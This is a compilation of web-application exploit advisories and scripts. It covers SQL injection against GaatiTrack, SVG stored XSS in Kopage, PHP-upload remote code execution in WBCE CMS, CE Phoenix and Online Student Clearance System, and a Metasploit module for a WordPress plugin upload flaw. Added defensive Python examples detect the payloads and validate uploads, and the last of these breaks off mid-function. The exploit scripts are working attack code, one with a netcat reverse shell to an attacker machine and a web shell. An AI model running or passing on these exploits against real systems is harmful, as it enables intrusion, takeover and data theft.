<pre><code># Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection<br /># Date: 13/11/2023<br /># Exploit Author: BugsBD Limited<br /># Discovered by: Rahad Chowdhury<br /># Vendor Homepage: https://www.mayurik.com/<br /># Software Link:<br />https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php<br /># Version: v1.0<br /># Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56<br /># CVE: CVE-2023-48823<br /><br />Description:<br />Blind SQL injection in ajax.php in GaatiTrack Courier Management<br />System v1.0 allows an unauthenticated attacker to insert malicious SQL<br />queries via the email parameter.<br /><br /><br />Steps to Reproduce:<br /><br />1. Request:<br /><br />POST /gaatitrack/ajax.php?action=login HTTP/1.1<br />Host: 192.168.1.74<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 83<br />Origin: http://192.168.1.74<br />Connection: close<br />Referer: http://192.168.1.74/gaatitrack/login.php<br />Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;<br />KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;<br />KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc<br /><br />email=test%40test.com&password=123456<br /><br />2. Now append the blind SQLi payload to the email parameter, so the request data becomes:<br /><br />POST /gaatitrack/ajax.php?action=login HTTP/1.1<br />Host: 192.168.1.74<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/119.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 83<br />Origin: http://192.168.1.74<br />Connection: close<br />Referer: http://192.168.1.74/gaatitrack/login.php<br />Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;<br />KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;<br />KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc<br /><br />email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456<br /><br />## Reproduce:<br />[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)<br /></code></pre>
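Two defender-side checks for the time-based blind SQL injection described above, written as an added example (Python; not part of the BugsBD advisory or the GaatiTrack code): a request-body inspector that percent-decodes the form fields and flags the sleep()/quote-then-operator pattern of the advisory's own payload, and the parameterised lookup that makes such a payload inert. The indicator list, the sqlite3 schema and the single user row are constructed for this example; sqlite3 stands in for the application's MySQL.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample request bodies, taken from the two requests in the advisory above:
# the first is a normal login, the second carries the time-based payload in "email".
BENIGN_BODY = "email=test%40test.com&password=123456"
INJECTED_BODY = ("email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'"
                 "&password=123456")

# Indicators of time-based (blind) SQL injection, keyed by the DBMS function abused.
# The list is constructed for this example; add the functions of the DBMS you run.
TIME_BASED_PATTERNS = {
    "mysql_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "mysql_benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "postgres_pg_sleep": re.compile(r"\bpg_sleep\s*\(", re.I),
    "mssql_waitfor_delay": re.compile(r"\bwaitfor\s+delay\b", re.I),
}
# Structural half of the advisory's payload: a quote that closes the string literal,
# immediately followed by a boolean operator that splices a new expression into the query.
QUOTE_THEN_OPERATOR = re.compile(r"['\"]\s*(?:xor|or|and|\|\||&&)(?=[\s(])", re.I)


def decode_form_body(body: str) -> dict:
    """Parse application/x-www-form-urlencoded into {field: [values]}, percent-decoding once.

    The payload only becomes recognisable after decoding (%2C is the comma between the
    if() arguments), so detection must run on decoded values, never on the raw body.
    """
    return urllib.parse.parse_qs(body, keep_blank_values=True)


def sqli_indicators(value: str) -> list:
    """Return the names of all indicators that fire on one decoded field value."""
    found = [name for name, pattern in TIME_BASED_PATTERNS.items() if pattern.search(value)]
    if QUOTE_THEN_OPERATOR.search(value):
        found.append("quote_then_boolean_operator")
    return found


def inspect_request(body: str) -> dict:
    """Return {field: [indicators]} for every form field that fires at least one indicator."""
    hits = {}
    for field, values in decode_form_body(body).items():
        for value in values:
            indicators = sqli_indicators(value)
            if indicators:
                hits.setdefault(field, []).extend(indicators)
    return hits


# Remediation side: a parameterised lookup. sqlite3 stands in for the application's MySQL;
# the schema and the single row are constructed for this example.
def demo_users_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE NOT NULL, "
                 "password_hash TEXT NOT NULL)")
    # Constructed row; a real deployment stores a password hash here, never the password
    conn.execute("INSERT INTO users (email, password_hash) VALUES (?, ?)",
                 ("test@test.com", "PLACEHOLDER-PASSWORD-HASH"))
    conn.commit()
    return conn


def find_user_by_email(conn: sqlite3.Connection, email: str):
    """Look the user up with a bound parameter: the value can never alter the SQL statement.

    Compare with string building such as f"... WHERE email = '{email}'", where the quote
    in the advisory's payload closes the literal and the remainder runs as SQL.
    """
    return conn.execute("SELECT id, email FROM users WHERE email = ?", (email,)).fetchone()


if __name__ == "__main__":
    print("benign  :", inspect_request(BENIGN_BODY))
    print("injected:", inspect_request(INJECTED_BODY))
    conn = demo_users_db()
    hostile_email = decode_form_body(INJECTED_BODY)["email"][0]
    print("lookup with payload as bound parameter:", find_user_by_email(conn, hostile_email))
```

The inspector is written for a WAF rule or a log-review job over captured request bodies; a response-time alert on the login endpoint (requests taking several seconds longer than the baseline) is the complementary signal for the sleep() variant. The lookup is the fix: with a bound parameter the payload is compared as an email address and simply matches no row.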
<pre><code>#Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)<br />#Date: 1/12/2023<br />#Exploit Author: tmrswrr<br />#Vendor Homepage: https://www.kopage.com/<br />#Version: 4.4.15<br />#Tested on: https://demo.kopage.com/index.php<br /><br /><br />#Poc:<br /><br />1 ) Install the system through the website and log in with any user.<br />2 ) Go to the Files field and click upload.<br />3 ) Upload your SVG file.<br /><br />Payload :<br /><br />&lt;svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500"&gt;<br /> &lt;script&gt;//&lt;![CDATA[<br /> alert(document.domain)<br /> //]]&gt;<br /> &lt;/script&gt;<br />&lt;/svg&gt;<br /><br />4 ) Open the SVG file URL; the alert box appears.<br /><br />Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg<br /><br /></code></pre>
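As an added example (Python; not from the Kopage advisory or the product), a screening check for SVG uploads of the kind used in this PoC: it parses the file as XML and reports script elements, event-handler attributes, javascript:/data: hrefs and DTD declarations. The deny-lists and the comparison SVGs are constructed for this example; the first sample is the advisory's payload.

```python
import re
import xml.etree.ElementTree as ET

# Element local names that execute script or embed foreign/active content.
# Deny-list constructed for this example; it is a screening step, not a complete sanitiser.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "object", "embed"}
FORBIDDEN_URL_SCHEMES = ("javascript:", "data:", "vbscript:")
DTD_DECLARATION = re.compile(rb"<!(?:DOCTYPE|ENTITY)", re.I)

# The advisory's payload (a script element inside an SVG document) and constructed
# comparison cases.
KOPAGE_PAYLOAD = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
 <script>//<![CDATA[
 alert(document.domain)
 //]]>
 </script>
</svg>"""
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4" fill="red"/></svg>')
ONLOAD_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="run()"/>'
JS_HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
               b'<a xlink:href="javascript:run()"><text>click</text></a></svg>')
DTD_SVG = b'<!DOCTYPE svg [<!ENTITY x "y">]><svg xmlns="http://www.w3.org/2000/svg">&x;</svg>'


def local_name(qualified: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qualified.rsplit("}", 1)[-1]


def svg_findings(data: bytes) -> list:
    """Return the reasons an uploaded SVG is unsafe to serve inline; [] means none found."""
    if DTD_DECLARATION.search(data):
        # Refuse DTDs outright: entity expansion and external entities are not worth parsing
        return ["DOCTYPE/ENTITY declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if local_name(root.tag) != "svg":
        findings.append(f"root element is <{local_name(root.tag)}>, not <svg>")
    for element in root.iter():
        name = local_name(element.tag)
        if name in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{name}>")
        for attribute, value in element.attrib.items():
            attr_name = local_name(attribute)
            if attr_name.lower().startswith("on"):
                # onload, onclick, onmouseover ... all run script when the SVG renders inline
                findings.append(f"event handler attribute {attr_name} on <{name}>")
            if attr_name == "href" and value.strip().lower().startswith(FORBIDDEN_URL_SCHEMES):
                scheme = value.strip().split(":", 1)[0].lower()
                findings.append(f"{attr_name} on <{name}> uses a {scheme}: URL")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not svg_findings(data)


if __name__ == "__main__":
    for label, sample in [("kopage payload", KOPAGE_PAYLOAD), ("benign", BENIGN_SVG),
                          ("onload", ONLOAD_SVG), ("javascript href", JS_HREF_SVG),
                          ("dtd", DTD_SVG)]:
        print(f"{label:16} -> {svg_findings(sample) or 'no findings'}")
```

Screening is the first layer only: user-uploaded SVG should be served from a separate origin or with `Content-Disposition: attachment`, under a Content-Security-Policy that forbids inline script, so that anything the deny-list misses still cannot run in the application's origin.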
<pre><code># Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution<br /># Date: 30/11/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://wbce-cms.org/<br /># Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip<br /># Version: 1.6.1<br /># Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS<br /><br />## POC:<br /><br />1 ) Log in with admin credentials and click Add-ons<br />2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php<br />3 ) Upload upgrade.php > &lt;?php echo system('id'); ?&gt; , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php<br />4 ) You will see the id command result<br /><br />Result: <br /><br />uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) <br /><br />### Post Request:<br /><br />POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1<br />Host: demos6.softaculous.com<br />Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; 
demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php<br />Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459<br />Content-Length: 522<br />Origin: https://demos6.softaculous.com<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />-----------------------------86020911415982314764024459<br />Content-Disposition: form-data; name="formtoken"<br /><br />5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c<br />-----------------------------86020911415982314764024459<br />Content-Disposition: form-data; name="userfile"; filename="upgrade.php"<br />Content-Type: application/x-php<br /><br /><?php echo system('id'); ?><br /><br />-----------------------------86020911415982314764024459<br />Content-Disposition: form-data; name="submit"<br /><br /><br 
/>-----------------------------86020911415982314764024459--<br /><br />### Response : <br /><br />&lt;!-- ################### Up from here: Original Code from original template ########### --&gt;<br /><br />&lt;!-- senseless positioning-table: needed for old modules which base on class td.content --&gt;<br />&lt;div class="row" style="overflow:visible"&gt;<br />&lt;div class="fg12"&gt;<br />&lt;table id="former_positioning_table"&gt;<br />&lt;tr&gt;<br /> &lt;td class="content"&gt;<br />uid=1000(soft) gid=1000(soft) groups=1000(soft)<br />uid=1000(soft) gid=1000(soft) groups=1000(soft)<br /> &lt;div class="top alertbox_error fg12 error-box"&gt;<br /> &lt;i class=" fa fa-2x fa-warning signal"&gt;&lt;/i&gt;<br /><br /> &lt;p&gt;Invalid WBCE CMS language file. Please check the text file.&lt;/p&gt;<br /> <br /> &lt;p&gt;&lt;a href="index.php" class="button"&gt;Back<br /><br /></code></pre>
<pre><code>## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)<br />#### Date: 2023-11-25<br />#### Exploit Author: tmrswrr<br />#### Category: Webapps<br />#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)<br />#### Version: v1.0.8.20<br />#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)<br /><br />## EXPLOIT :<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import sys<br />import urllib.parse<br />import random<br />from time import sleep<br /><br />class colors:<br /> OKBLUE = '\033[94m'<br /> WARNING = '\033[93m'<br /> FAIL = '\033[91m'<br /> ENDC = '\033[0m'<br /> BOLD = '\033[1m'<br /> UNDERLINE = '\033[4m'<br /> CBLACK = '\33[30m'<br /> CRED = '\33[31m'<br /> CGREEN = '\33[32m'<br /> CYELLOW = '\33[33m'<br /> CBLUE = '\33[34m'<br /> CVIOLET = '\33[35m'<br /> CBEIGE = '\33[36m'<br /> CWHITE = '\33[37m'<br /><br /> <br />def entry_banner():<br /> color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,<br /> colors.CRED, colors.CBEIGE]<br /> random.shuffle(color_random)<br /><br /> banner = color_random[0] + """<br /> CE Phoenix v1.0.8.20 - Remote Code Execution \n<br /> Author: tmrswrr<br /> """<br /> for char in banner:<br /> print(char, end='')<br /> sys.stdout.flush()<br /> sleep(0.0045)<br /><br />def get_formid_and_cookies(session, url):<br /> response = session.get(url, allow_redirects=True)<br /> if response.ok:<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> formid_input = soup.find('input', {'name': 'formid'})<br /> if formid_input:<br /> return formid_input['value'], session.cookies<br /> return None, None<br /><br />def perform_exploit(session, url, username, password, command):<br /> print("\n[+] Attempting to exploit the target...")<br /><br /> <br /> initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"<br /> formid, cookies = 
get_formid_and_cookies(session, initial_url)<br /> if not formid:<br /> print("[-] Failed to retrieve initial formid.")<br /> return<br /><br /> # Login<br /> print("[+] Performing login...")<br /> login_payload = {<br /> 'formid': formid,<br /> 'username': username,<br /> 'password': password<br /> }<br /> login_headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',<br /> 'Referer': initial_url<br /> }<br /> login_url = url + "/admin/login.php?action=process"<br /> login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)<br /><br /> if not login_response.ok:<br /> print("[-] Login failed.")<br /> print(login_response.text)<br /> return<br /><br /> print("[+] Login successful.")<br /><br /><br /> new_formid, _ = get_formid_and_cookies(session, login_response.url)<br /> if not new_formid:<br /> print("[-] Failed to retrieve new formid after login.")<br /> return<br /><br /> # Exploit<br /> print("[+] Executing the exploit...")<br /> encoded_command = urllib.parse.quote_plus(command)<br /> exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"<br /> exploit_headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',<br /> 'Referer': login_response.url<br /> }<br /> exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"<br /> exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)<br /><br /> if exploit_response.ok:<br /> print("[+] Exploit executed 
successfully.")<br /> else:<br /> print("[-] Exploit failed.")<br /> print(exploit_response.text)<br /><br /> <br /> final_response = session.get(url)<br /> print("\n[+] Executed Command Output:\n")<br /> print(final_response.text) <br /><br />def main(base_url, username, password, command):<br /> print("\n[+] Starting the exploitation process...")<br /> session = requests.Session()<br /> perform_exploit(session, base_url, username, password, command)<br /><br />if __name__ == "__main__":<br /> entry_banner()<br /><br /> if len(sys.argv) < 5:<br /> print("Usage: python script.py [URL] [username] [password] [command]")<br /> sys.exit(1)<br /><br /> base_url = sys.argv[1]<br /> username = sys.argv[2]<br /> password = sys.argv[3]<br /> command = sys.argv[4]<br /><br /> main(base_url, username, password, command)<br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE (Authenticated)<br /># Date: 28/11/2023<br /># Exploit Author: Akash Pandey aka l3v1ath0n<br /># Version: <= 1.0<br /># Tested on: Kali Linux<br /># CVE : CVE-2022-3436<br /><br />import requests<br />import time<br />import os<br /><br /><br />print("""<br /><br /> ____ ___ ____ ____ _____ _ _ _____ __ <br /> _____ _____ |___ \ / _ \___ \|___ \ |___ /| || ||___ / / /_ <br /> / __\ \ / / _ \_____ __) | | | |__) | __) |____ |_ \| || |_ |_ \| '_ \ <br />| (__ \ V / __/_____/ __/| |_| / __/ / __/_____|__) |__ _|__) | (_) |<br /> \___| \_/ \___| |_____|\___/_____|_____| |____/ |_||____/ \___/ <br /> <br />Exploit: By Akash Pandey aka l3v1ath0n, developed with ❤️:<br />Twitter: https://twitter.com/_l3v1ath0n<br />Github: https://www.github.com/1337-L3V1ATH0N/Exploit_Development/<br />""")<br /><br /><br />web_url = "http://192.168.1.26/student/" # Edit this as per your need<br />username = "18/132010" # Default Username<br />password = "11111111" # Default Password<br />local_ip = "192.168.1.6" # Edit this IP to your local Ip for reverse shell<br />local_port = "1337" # Port of local machine to connect reverse shell on...<br />rev_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + local_ip + " " + local_port + " >/tmp/f"<br /><br /># Firing request to login<br />log_url = web_url+"login.php"<br /><br />#Telling script to use previous session<br />session = requests.Session()<br /><br />#Post Body Data for login<br />post_data = {'txtmatric_no':username,'txtpassword':password, 'btnlogin':''}<br /><br />#Sending request to web server with required post data<br />response = session.post(log_url,data=post_data)<br /><br /># Checking Login if Successful:<br />time.sleep(1)<br /><br /># Creating a shell file in current directory<br />print("[i] Creating a shell file to upload.")<br /><br />with open("shell.php","w") as file:<br /> 
file.write("&lt;?php echo shell_exec($_GET['cmd'].' 2>&amp;1'); ?&gt;")<br /> file.close()<br />time.sleep(1)<br /><br />print("[i] Checking Login.")<br /><br />if response.history:<br /> print("[+] Login Successful.")<br /><br /> time.sleep(1)<br /><br /> print("[i] Uploading Shell.")<br /><br /> # Step 1: Reads the shell.php file in current folder<br /> # Step 2: Stores the content in filename called shell.php<br /> # Step 3: Uses the variable name userImage to upload file to server.<br /> file = {'userImage':('shell.php',open("shell.php","rb"))}<br /> <br /> # Sending payload as POST data to shell.php file<br /> payload = {'userImage':"&lt;?php echo shell_exec($_GET['cmd'].' 2>&amp;1'); ?&gt;",'btnedit':''}<br /><br /> # Uploading the malicious php file at below path using files and data values <br /> upload_response = session.post(web_url+"edit-photo.php",files=file,data=payload)<br /> print ("[TIP] Run netcat to catch reverse-shell on nc. Edit IP and Port in script")<br /> while True:<br /> command = input("l3v1ath0n㉿CVE-2022-3436: ")<br /> if command == "exit":<br /> break<br /> elif command == "netcat":<br /> print("[!] Don't forget to start Netcat Listener")<br /> time.sleep(3)<br /> payload = {'cmd':rev_shell}<br /> cmd = session.get(web_url+"uploads/shell.php?",params=payload)<br /> print(cmd.text)<br /> else:<br /> payload = {'cmd':command}<br /> cmd = session.get(web_url+"uploads/shell.php?",params=payload)<br /> print(cmd.text)<br /><br /> print("\n[i] Closing this Session")<br /> session.close()<br /><br />else:<br /> print("[-] Login Failed.")<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Wordpress<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'WordPress Royal Elementor Addons RCE',<br /> 'Description' => %q{<br /> Exploit for the unauthenticated file upload vulnerability in WordPress Royal Elementor Addons and Templates plugin (< 1.3.79).<br /> },<br /> 'Author' => [<br /> 'Fioravante Souza', # Vulnerability discovery<br /> 'Valentin Lobstein' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2023-5360'],<br /> ['URL', 'https://vulners.com/nuclei/NUCLEI:CVE-2023-5360'],<br /> ['WPVDB', '281518ff-7816-4007-b712-63aed7828b34']<br /> ],<br /> 'Platform' => ['unix', 'linux', 'win', 'php'],<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [['Automatic', {}]],<br /> 'DisclosureDate' => '2023-11-23',<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> },<br /> 'Privileged' => false,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> return CheckCode::Unknown unless wordpress_and_online?<br /><br /> wp_version = wordpress_version<br /> print_status("WordPress Version: #{wp_version}") if wp_version<br /><br /> check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')<br /><br /> if check_code.code != 'appears'<br /> return CheckCode::Safe<br /> end<br /><br /> plugin_version = check_code.details[:version]<br /> print_good("Detected Royal 
Elementor Addons version: #{plugin_version}")<br /> return CheckCode::Appears<br /> end<br /><br /> def exploit<br /> print_status('Attempting to retrieve nonce...')<br /> nonce = retrieve_nonce<br /><br /> print_status('Sending payload')<br /> uri = normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')<br /><br /> data = {<br /> 'action' => 'wpr_addons_upload_file',<br /> 'max_file_size' => rand(10001),<br /> 'allowed_file_types' => 'ph$p',<br /> 'triggering_event' => 'click',<br /> 'wpr_addons_nonce' => nonce<br /> }<br /><br /> file_content = '<?php '<br /> file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")<br /> file_content << '?>'<br /><br /> file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"<br /><br /> post_data = Rex::MIME::Message.new<br /> post_data.add_part(file_content, 'application/octet-stream', nil, "form-data; name=\"uploaded_file\"; filename=\"#{file_name}\"")<br /> data.each_pair do |key, value|<br /> post_data.add_part(value.to_s, nil, nil, "form-data; name=\"#{key}\"")<br /> end<br /><br /> res = send_request_cgi({<br /> 'uri' => uri,<br /> 'method' => 'POST',<br /> 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",<br /> 'data' => post_data.to_s<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unreachable, 'No response received from the target')<br /> end<br /><br /> if res.code == 200 && res.body.include?('success')<br /> print_good('Payload uploaded successfully')<br /> response_data = JSON.parse(res.body)<br /> if response_data.key?('data') && response_data['data'].key?('url')<br /> file_url = response_data['data']['url']<br /> print_status('Triggering the payload')<br /> send_request_cgi({<br /> 'uri' => file_url,<br /> 'method' => 'GET'<br /> })<br /><br /> else<br /> fail_with(Failure::UnexpectedReply, 'Payload uploaded but no URL returned in the response')<br /> end<br /> else<br /> 
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')<br /> end<br /> end<br /><br /> def retrieve_nonce<br /> res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'method' => 'GET')<br /><br /> fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200<br /><br /> match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)<br /> fail_with(Failure::NoTarget, 'Nonce not found in the response. Is Royal Elementor Addons activated AND being used by the WordPress site being targeted?') if match.nil? || match[1].nil?<br /><br /> nonce = JSON.parse(match[1])['nonce']<br /> fail_with(Failure::NoTarget, 'Parsed a response, but the nonce value is missing') if nonce.nil?<br /><br /> print_good("Nonce found in response: #{nonce.inspect}")<br /> nonce<br /> end<br />end<br /></code></pre>
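The WBCE language installer, the Online Student Clearance edit-photo.php upload and the Royal Elementor Addons ajax upload above all accept a file the server then executes as PHP; the Royal Elementor case additionally trusts a client-supplied allowed_file_types field and a .ph$p filename. As an added example (Python; not code from any of these projects or advisories), an upload validator that decides the type from a server-side allow-list and the file's magic bytes, refuses executable extensions anywhere in the name, and stores the file under a random server-chosen name. The allow-list, the extension sets and the sample bodies are constructed for this example. The CE Phoenix define_language.php issue is a different class (an admin editor writing submitted text into a .php file) and is not modelled here.

```python
import os
import re
import secrets

# Server-side allow-list: extension -> magic-byte prefixes the body must start with.
# Constructed for this example and kept short on purpose; this table is the only
# source of truth for accepted types.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions a web server may hand to the PHP interpreter; rejected anywhere in the name,
# so shell.php.png and upgrade.php are both refused before the allow-list is consulted.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "htaccess"}
EXTENSION_CHARS = re.compile(r"[a-z0-9]+")

# Constructed sample bodies: a minimal PNG header and a PHP open tag.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_PHP = b"<?php /* constructed placeholder */ ?>"


class UploadRejected(ValueError):
    """Raised with the reason an upload was refused."""


def validate_upload(filename: str, content: bytes, upload_dir: str = "/var/www/uploads") -> str:
    """Return the server-chosen storage path for an accepted upload or raise UploadRejected.

    Nothing the client sends is trusted for the type decision: not the filename's
    extension on its own, not the part's Content-Type, and not a form field that names
    the allowed types (the WordPress plugin above accepted exactly such a field).
    """
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory component
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("filename must have the form name.extension")
    extension = parts[-1]
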